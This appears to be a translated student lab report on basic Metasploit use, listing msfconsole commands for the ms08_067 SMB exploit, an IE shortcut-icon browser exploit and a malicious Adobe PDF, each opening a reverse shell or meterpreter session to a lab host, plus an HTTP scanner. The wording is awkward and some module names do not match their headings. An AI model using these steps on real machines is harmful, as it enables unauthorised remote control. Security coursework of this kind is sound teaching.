2017-2018-2 20155231 "Network Countermeasure Technology" Experiment 5: MSF Basic Application

Experimental content

An active attack practice such as ms08_067

enable msf terminalmsfconsole
Then use the search command to search for the module corresponding to the vulnerability:search ms08_067
The path name of the penetration attack module is "exploit/windows/smb/ms08_067_netapi" and consists of four parts: module type, target platform, target service and module name.

use exploit/windows/smb/ms08_067_netapi

View information:
show payloads
Select attack payload:
set payload generic/shell_reverse_tcp
View the configuration items required to configure penetration attacks:
show options
View the target platforms that the penetration attack module can successfully penetrate and attack
show targets
Set attack IP (default port 445)
set RHOST 192.168.241.138
After success, connect back to the host port 5231
set LPORT 5231
set LHOST 192.168.241.134
The target system type is 5 here (this system has no Data Execution Prevention Feature (DEF)
set target 5
Check whether the value of the option setting after setting is correct:
show options
launch an infiltration attack
exploit

View Results
ipconfig /all

A browser-targeted attack such as ms11_050

Here is a vulnerability of IE browser found on the Internet: ms14_064 (we are different)

First enter search ms14_064Find Vulnerabilities
Attack the browser, enteruse exploit/windows/browser/ms10_046_shortcut_icon_
Enter show payloads, view the load to select, here is the experimental loadset payload generic/shell_reverse_tcp
show optionsQuery needs to be configured
enterset SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5231
Enter the exploitgenerated URL
Access the URL on the windows side
Enter on the kuil side sessions, you can see a connection with an ID of 1
Then enter session -i 1, connect to the connection with ID 1, enter the shell, and get it successfully.

A client-side attack such as Adobe

First, use search adobethe search
then selectuse windows/fileformat/adobe_flashplayer_button

3. Then set payload windows/meterpreter/reverse_tcp, use to show optionsview the information to be configured

Need to configure LHOST, LPORT,FILENAME
input exploit, generate pdf file
Enter use exploit/multi/handler, set listening port, host number
exploitstart listening
On the windows side, open 20155231.pdf and connect back successfully

(We are different... Tried many templates, but only succeeded once, no screenshots yet. Most of them are like this, the connection is not successful, and the port is not opened)

Successfully applied any of the auxiliary modules

Use show auxiliary to view auxiliary modules (we are different)
Select scanner/http/title to scan webpage tags
View configuration, configure LHOST192.168.241.134
input exploitto monitor

Display as shown. But I don't know where the label is recorded, what is the use of this loophole?

Answer questions after the test

Explain what is exploit, payload, encode in your own words.

An exploit is an execution vulnerability.
payload is the payload, a vector template that executes the code
encode is encoding, disguising our program or code

Practice summary and experience

Because my computer configuration is a bit sloppy. . The two virtual machines opened the card together, and used the computer of the classmate to do the experiment. Successful people are the same, unsuccessful people are different. Check out the problems and solutions encountered by other students in the experiment. Some are resolved, some are still not resolved. . .

What technologies or steps are still missing from actual combat?

Many files generated by vulnerabilities will be checked and killed by the housekeeper. It is a problem to realize the connection back in actual combat, and it is also a problem to induce the target drone to perform operations.